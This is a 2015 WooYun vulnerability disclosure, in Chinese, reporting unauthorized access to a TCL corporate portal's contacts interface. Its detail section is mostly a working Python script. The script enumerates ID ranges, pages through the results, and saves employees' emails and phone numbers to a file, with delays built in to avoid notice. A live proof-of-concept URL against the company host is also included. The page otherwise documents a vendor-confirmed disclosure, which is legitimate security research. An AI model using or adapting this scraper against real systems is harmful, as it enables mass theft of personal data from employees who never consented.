当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114754

漏洞标题:我是如何获得TCL全部员工邮箱与电话的(附验证脚本)

相关厂商:TCL集团财务有限公司

漏洞作者: MyKings

提交时间:2015-05-18 14:08

修复时间:2015-07-02 14:24

公开时间:2015-07-02 14:24

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

一个系统查询接口存在未授权访问~

详细说明:


#!/usr/bin/env python
# coding: utf-8
# pip install requests requests_ntlm
import requests
import re
import sys
import time
from requests_ntlm import HttpNtlmAuth
reload(sys)
sys.setdefaultencoding('utf-8')
PAGE_REGEX = re.compile(r'PageCount":.*(\d),')
def main(start_num, end_num):
delay = 3
delay_count = 100
i = 0
with open('tcl_account.txt','a') as f:
for id in xrange(start_num, end_num):
i += 1
_url = "http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=000%s" % id
json, pagecount = get(_url)
print _url
f.write('%s\n%s\n' % (_url,json))
if pagecount > 1:
print '[*] found page size: %s' % pagecount
for pageindex in range(2, pagecount+1):
page_url = _url.replace('pageIndex=1', 'pageIndex=%s' % pageindex)
print '[%s]' % pageindex, page_url
_json, _ = get(page_url)
f.write('%s\n%s\n' % (page_url, _json))
if i % delay_count == 0:
time.sleep(delay)
print '[-] delay %s(s)' % delay

def get(url):
url = "%s&t=%s" % (url, time.time())
result = ''
pagecount = 1
auth_nt = HttpNtlmAuth('user', '***')
#req = requests.get(url=url, auth=auth_nt)
req = requests.get(url=url, timeout=15)
if req.status_code == 200:
result = req.text
match = PAGE_REGEX.search(result)
if match:
pagecount = int(match.group(1))
return (result, pagecount)
if __name__ == '__main__':
main(84599, 87715)


支持分页抓取

漏洞证明:

http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=00085221

修复方案:

添加权限~

版权声明:转载请注明来源 MyKings@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-18 14:23

厂商回复:

非常感谢您对我公司信息系统的帮助,将会转发给相应的同事跟进。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-18 14:38 | MyKings ( 普通白帽子 | Rank:114 漏洞数:24 )

    详细细节可以向我咨询啦了~弱弱问下有礼物不?

  2. 2015-05-18 15:00 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    @MyKings 求大神透露细节